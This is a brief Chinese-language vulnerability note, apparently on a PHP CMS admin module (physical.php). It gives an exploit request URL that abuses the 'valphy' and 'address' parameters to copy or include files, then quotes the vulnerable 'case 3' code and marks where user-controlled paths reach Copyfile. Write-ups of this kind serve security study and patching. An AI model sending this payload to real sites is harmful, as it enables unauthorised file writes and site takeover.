### exp

/admin/app/physical/physical.php?action=op&op=3&valphy=test|文件名&address=包含文件

### 代码分析

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39  case 3: $fileaddr=explode('/',$val[1]); $filedir="../../../".$fileaddr[0]; if(!file_exists($filedir)){ @mkdir ($filedir, 0777); } if($fileaddr[1]=="index.php"){ if($val[2]){ Copyindx("../../../".$val[1],$val[2]); } }else{ // 漏洞点 switch($val[2]){ case 1:$address="../about/$fileaddr[1]"; break; case 2:$address="../news/$fileaddr[1]"; break; case 3:$address="../product/$fileaddr[1]"; break; case 4:$address="../download/$fileaddr[1]"; break; case 5:$address="../img/$fileaddr[1]"; break; case 8:$address="../feedback/$fileaddr[1]"; break; }$newfile ="../../../$val[1]"; Copyfile($address,$newfile); } echo$lang_physicalgenok; break;

 1 2 3   default: \$address = ""; break;